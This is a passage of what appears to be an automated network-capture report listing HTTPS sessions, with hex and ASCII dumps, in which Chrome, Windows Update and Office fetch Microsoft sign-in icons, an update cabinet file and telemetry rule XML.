                                          Connection: close
                                          Cache-Control: public, max-age=31536000
                                          Content-Encoding: gzip
                                          Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                          ETag: 0x8DB5C3F499A9B99
                                          x-ms-request-id: b7a365f3-401e-0045-7898-3716b5000000
                                          x-ms-version: 2009-09-19
                                          x-ms-lease-status: unlocked
                                          x-ms-blob-type: BlockBlob
                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                          Access-Control-Allow-Origin: *
                                          x-azure-ref: 20241118T224358Z-164f84587bfsgfx9hC1DFWw1as00000006bg00000000cpv8
                                          x-fd-int-roxy-purgeid: 4554691
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:43:58 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                          Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          21192.168.2.44976113.107.246.454435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:58 UTC416OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                          Host: logincdn.msauth.net
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:58 UTC806INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:43:58 GMT
                                          Content-Type: image/svg+xml
                                          Content-Length: 276
                                          Connection: close
                                          Cache-Control: public, max-age=31536000
                                          Content-Encoding: gzip
                                          Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                          ETag: 0x8D79ED35591CF44
                                          x-ms-request-id: ac693482-901e-0056-18c2-3932b9000000
                                          x-ms-version: 2009-09-19
                                          x-ms-lease-status: unlocked
                                          x-ms-blob-type: BlockBlob
                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                          Access-Control-Allow-Origin: *
                                          x-azure-ref: 20241118T224358Z-16547b76f7fwggrphC1DFW2a8s00000005b000000000ca3c
                                          x-fd-int-roxy-purgeid: 79218156
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:43:58 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                          Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          22192.168.2.449764152.199.21.1754435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:58 UTC424OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                          Host: aadcdn.msftauth.net
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:58 UTC738INHTTP/1.1 200 OK
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                          Age: 20625010
                                          Cache-Control: public, max-age=31536000
                                          Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                          Content-Type: image/svg+xml
                                          Date: Mon, 18 Nov 2024 22:43:58 GMT
                                          Etag: 0x8DB5C3F4AC59B47
                                          Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                          Server: ECAcc (lhc/78BB)
                                          Vary: Accept-Encoding
                                          X-Cache: HIT
                                          x-ms-blob-type: BlockBlob
                                          x-ms-lease-status: unlocked
                                          x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                          x-ms-version: 2009-09-19
                                          Content-Length: 1636
                                          Connection: close
                                          2024-11-18 22:43:58 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          23192.168.2.4497694.175.87.197443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:05 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=B5bKZDxnBObbmlV&MD=p7OkZYoh HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                          Host: slscr.update.microsoft.com
                                          2024-11-18 22:44:05 UTC560INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          Content-Type: application/octet-stream
                                          Expires: -1
                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                          MS-CorrelationId: 1e0650d1-5814-4760-ac6a-14bbb3f31042
                                          MS-RequestId: a66093f3-2c80-4ff0-8faf-436bad753294
                                          MS-CV: +8lWK8uWIUK7I89M.0
                                          X-Microsoft-SLSClientCache: 2880
                                          Content-Disposition: attachment; filename=environment.cab
                                          X-Content-Type-Options: nosniff
                                          Date: Mon, 18 Nov 2024 22:44:04 GMT
                                          Connection: close
                                          Content-Length: 24490
                                          2024-11-18 22:44:05 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                          2024-11-18 22:44:05 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24192.168.2.45730113.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:45 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:45 UTC492INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:45 GMT
                                          Content-Type: text/plain
                                          Content-Length: 218853
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public
                                          Last-Modified: Sat, 16 Nov 2024 09:12:53 GMT
                                          ETag: "0x8DD061EDA65C651"
                                          x-ms-request-id: 1f2ca79a-801e-0015-0d8f-38f97f000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224445Z-r18f44ddb69pgpd4hC1DFWgac800000000kg00000000aw9d
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:45 UTC15892INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                          Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                          2024-11-18 22:44:45 UTC16384INData Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                          Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
                                          2024-11-18 22:44:45 UTC16384INData Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54
                                          Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
                                          2024-11-18 22:44:45 UTC16384INData Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d
                                          Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
                                          2024-11-18 22:44:45 UTC16384INData Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a
                                          Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
                                          2024-11-18 22:44:45 UTC16384INData Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70
                                          Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
                                          2024-11-18 22:44:45 UTC16384INData Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20
                                          Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
                                          2024-11-18 22:44:45 UTC16384INData Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
                                          2024-11-18 22:44:45 UTC16384INData Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
                                          2024-11-18 22:44:45 UTC16384INData Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20
                                          Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          25192.168.2.4573024.175.87.197443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:45 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=B5bKZDxnBObbmlV&MD=p7OkZYoh HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                          Host: slscr.update.microsoft.com
                                          2024-11-18 22:44:46 UTC560INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          Content-Type: application/octet-stream
                                          Expires: -1
